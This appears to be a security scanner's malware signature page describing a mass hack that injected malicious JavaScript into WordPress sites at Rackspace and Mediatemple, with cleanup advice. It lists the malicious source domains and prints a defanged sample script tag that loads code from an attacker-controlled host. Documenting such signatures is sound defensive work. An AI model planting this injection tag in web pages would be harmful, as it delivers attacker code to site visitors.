SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwrks2


Description: Code used to insert a malicious javascript on sites
hosted at Rackspace and Mediatemple. It was a part of a mass hack that affected
a good number of sites (specially at Rackspace)

Loads malware from:
http://w7c5lrhqu .newsapis .us jquery.min.js
http://azure.smartenergymodel. com /js/jquery.min.js /js / jquery.min.js jquery.min.js js/ jquery.min.js js/ jquery.min.js
And other domains.

Affecting: WordPress sites hosted at Rackspace and Mediatemple (maybe other
hosting companies as well).

Clean up and details:: You have to remove the injected code that is generally
present at the bottom of every .php, .html or .js files (mass added by the attacker).


Malware sample::

< script src = http:// azure.smartenergymodel. com /js/jquery.min.js>